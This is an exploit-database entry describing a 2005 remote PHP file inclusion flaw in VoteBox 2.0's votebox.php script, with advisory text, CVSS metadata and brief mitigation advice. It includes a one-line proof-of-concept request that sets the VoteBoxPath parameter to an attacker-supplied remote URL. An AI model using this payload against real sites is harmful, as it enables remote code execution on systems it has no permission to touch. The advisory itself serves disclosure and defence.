header-logo
Suggest Exploit
vendor:
VoteBox
by:
SecurityFocus
7.5
CVSS
HIGH
Remote PHP File Include Vulnerability
98
CWE
Product Name: VoteBox
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: votebox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

VoteBox Remote PHP File Include Vulnerability

It is reported that VoteBox is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'votebox.php' script. Remote attackers could potentially exploit this issue to include and execute a remote malicious PHP script.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12806/info

It is reported that VoteBox is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'votebox.php' script.

Remote attackers could potentially exploit this issue to include and execute a remote malicious PHP script.

This issue reportedly affects VoteBox version 2.0, previous versions might also be affected. 

www.example.com/votebox.php?VoteBoxPath=http://[CMD]

Navigation

Suggest Exploit

Services By CQR